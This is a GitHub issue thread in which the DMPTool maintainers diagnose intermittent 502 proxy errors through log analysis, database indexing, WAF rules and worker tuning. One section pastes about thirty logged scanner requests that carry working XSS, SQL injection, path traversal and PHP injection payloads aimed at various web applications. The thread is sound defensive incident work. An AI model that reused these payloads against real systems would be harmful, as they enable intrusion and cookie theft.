Closed briri closed 1 week ago
Decided to do some analysis of the various 502 errors to see if one path was throwing the error more than others but they're all about the same:
Some 502 counts per path (combining between both hosts):
POST /answers/create_or_update?question_id={question_id}
GET /plans/{plan_id}/download
GET /public_plans
GET /plans/{plan_id}/export.pdf?{args}
I've done the query optimization mentioned above for the 1st 2. Will do the same for the other 2 on Monday
On Sunday:
[16/Jun/2024:04:44:40 -0700] "GET /secure/Dashboard.jspa HTTP/1.1" 302 502
[16/Jun/2024:04:45:33 -0700] "GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1" 302 502
This indicates that the WAF rules to block access to the plans/{plan_id}/download
and plans/{plan_id}/export.pdf
were responsible for blocking pumas workers.
I did some further analysis of the queries being executed on these pages and performed the following operations on the database:
answers
table: ALTER TABLE answers ENGINE=InnoDB;
settings
table (it had none): ALTER TABLE settings ADD INDEX settings_target (target_id, target_type);
The settings table has around 1,150,000 records (and had no indices other than its PK which is a Rails auto-increment).
After making those 2 changes I am now able to refresh both page 20-30 times without inducing a Proxy error.
I performed the following actions on prod:
answers
table: ALTER TABLE answers ENGINE=InnoDB;
settings
table: ALTER TABLE settings ADD INDEX settings_target (target_id, target_type);
controllers/plans_controller.rb
, controllers/answers_controller.rb
, views/branded/plans/_download_form.html.erb
(also added changes to Git so they will be in next AL2023 release)plans/{plan_id}/download
and plans/{plan_id}/export.pdf
I also updated our system notification to read (in English and Portuguese): "We are currently experiencing technical issues. DMP downloading may result in intermittent 502 errors. We apologize for the inconvenience and hope to resolve it within a few business days."
I will be monitoring the site throughout the day to see if the 502 issue has been resolved by these changes.
As of 9am there are no new 502 Proxy errors.
Checking again at noon and there is only one additional 502 on each host:
[16/Jun/2024:11:38:26 -0700] "GET /cgi-bin/PrintShibInfo.pl HTTP/1.1" 302 502
(different times)Checked again at 17:10 and only 2 additional 502 messages
[16/Jun/2024:14:52:25 -0700] "GET /orgs/search?context=9ac631b9524f&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=uni HTTP/1.1" 502 413
[16/Jun/2024:16:06:51 -0700] "GET /orgs/search?context=3819c5a048f0&funder_only=true&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=uni HTTP/1.1" 502 413
Very promising. Thanks for keeping an eye on things and reporting out over the weekend.
Get Outlook for iOShttps://aka.ms/o0ukef
From: Brian Riley @.> Sent: Sunday, June 16, 2024 5:11:57 PM To: CDLUC3/dmptool @.> Cc: Subscribed @.***> Subject: Re: [CDLUC3/dmptool] increased 502 errors (Issue #605)
CAUTION: EXTERNAL EMAIL
Checked again at 17:10 and only 2 additional 502 messages
— Reply to this email directly, view it on GitHubhttps://github.com/CDLUC3/dmptool/issues/605#issuecomment-2171950654, or unsubscribehttps://github.com/notifications/unsubscribe-auth/AAGF4L23H6PQGQFR3LXK5J3ZHYSU3AVCNFSM6AAAAABJLIAATGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDCNZRHE2TANRVGQ. You are receiving this because you are subscribed to this thread.Message ID: @.***>
Checking again at 22:00. The logs have rotated and the current logs which happened at 18:58. Even with significant bot activity, there are no 502 errors. Matomo shows only 175 visitors today, so slow weekend traffic. Will continue to monitor tomorrow.
Checking again at 8:00 and there are only a few 502s
172.30.4.32 - - [17/Jun/2024:04:51:11 -0700] "GET /orgs/search?context=5c6178780b0e&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=UNI HTTP/1.1" 502 413
172.30.4.32 - - [17/Jun/2024:04:51:21 -0700] "GET /orgs/search?context=5c6178780b0e&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=UNI HTTP/1.1" 502 413
172.30.43.110 - - [17/Jun/2024:05:46:56 -0700] "GET /orgs/search?context=7b4906feccbe&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=UNI HTTP/1.1" 502 413
172.30.43.110 - - [17/Jun/2024:05:47:04 -0700] "GET /plans/73986/export.pdf?export[question_headings]=true HTTP/1.1" 502 413
172.30.43.110 - - [17/Jun/2024:05:47:13 -0700] "GET /orgs/search?context=7b4906feccbe&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=UNI HTTP/1.1" 502 413
172.30.43.110 - - [17/Jun/2024:05:47:23 -0700] "GET /orgs/search?context=7b4906feccbe&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=UNI HTTP/1.1" 502 413
172.30.31.87 - - [17/Jun/2024:06:07:33 -0700] "GET /orgs/search?context=746ea9df554a&funder_only=false&known_only=false&managed_only=false&non_funder_only=false&template_owner_only=false&unknown_only=false&org_autocomplete%5Bname%5D=University%20 HTTP/1.1" 502 413
Patched the code behind the above /orgs/search
to optimize its performance:
We got a bunch of new 502 errors over the lunch break but they look like they were all for bot traffic, doesn't look like it disturbed legit users:
172.94.95.9 - - [17/Jun/2024:11:37:41 -0700] "GET /webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:38:01 -0700] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:38:41 -0700] "GET /bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:38:46 -0700] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:38:57 -0700] "GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:39:55 -0700] "GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:40:04 -0700] "GET /info.php?RESULT=\",msgArray);alert(document.domain);// HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:40:13 -0700] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:40:41 -0700] "GET /www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\" HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:41:07 -0700] "GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\" HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:41:29 -0700] "GET /wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:41:41 -0700] "GET /index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0 HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:41:46 -0700] "GET /forum/index.php?SQ=0&t=search&srch=2i1Dp2jFPI8yZekCBpuM4utK3zW&btn_submit=Search&field=all&forum_limiter&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22 HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:41:54 -0700] "GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port&TF_port&B_mac_apply=APPLY HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:42:35 -0700] "GET /fmlurlsvc/?url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:43:00 -0700] "GET /?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1" 502416
172.94.95.9 - - [17/Jun/2024:11:43:04 -0700] "GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:43:18 -0700] "GET /wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:43:50 -0700] "GET /modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1 HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:44:05 -0700] "GET /dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:44:37 -0700] "GET /wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:44:47 -0700] "GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:45:01 -0700] "GET /web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:11 -0700] "GET /webmail/?mid=aub5\"><img+src=x+onerror=confirm(document.domain)> HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:23 -0700] "GET /search?filtered=1&q=test&filter[price]=100-1331\"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:38 -0700] "GET /search?filter[brandid]=vnxjb\"><script>alert(document.cookie)</script>bvu51 HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:39 -0700] "GET //tagebuch/eintraege/index.html?reloaded&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:43 -0700] "GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"2i1DoC1Dq8AMUkWiiSCV04SM4P6\" HTTP/1.1" 502 416
172.94.95.9 - - [17/Jun/2024:11:46:58 -0700] "GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1" 502 416
we discovered that the above set of 502s were paths that should have been blocked by the firewall. Further investigation showed that the traffic was going directly to that instance instead of through the domain name which would have sent it through the firewall/load balancer. IAS updated the security group so that this was no longer allowed.
Closed after a few days of no issues
Just jotting down some final notes with regard to the increased 502 error activity we started seeing today.
Additional analysis after the call ended:
On Monday:
Remove WAS filters for the downloads, and exports.
Start blocking traffic to /cgi-bin
revert the number of workers back down to 2 (recommendation is to have one per CPU)
the number of DB connections in the pool should be slightly higher than the number of total threads (currently set to 16 DB connections but we bumped the workers to 8 with 5 threads each, so 40 threads!)
Add rate limiting to prevent a single IP from hitting our problematic paths within a certain threshold: Paths:
(suggestion from chatGPT):
Queries were being made to the Pilot pages while we were debugging. I doubt it is related, but worth seeing if that activity had an uptick on Friday vs Mon-Wed.
Need to continue to find an alternative for the PDF downloads.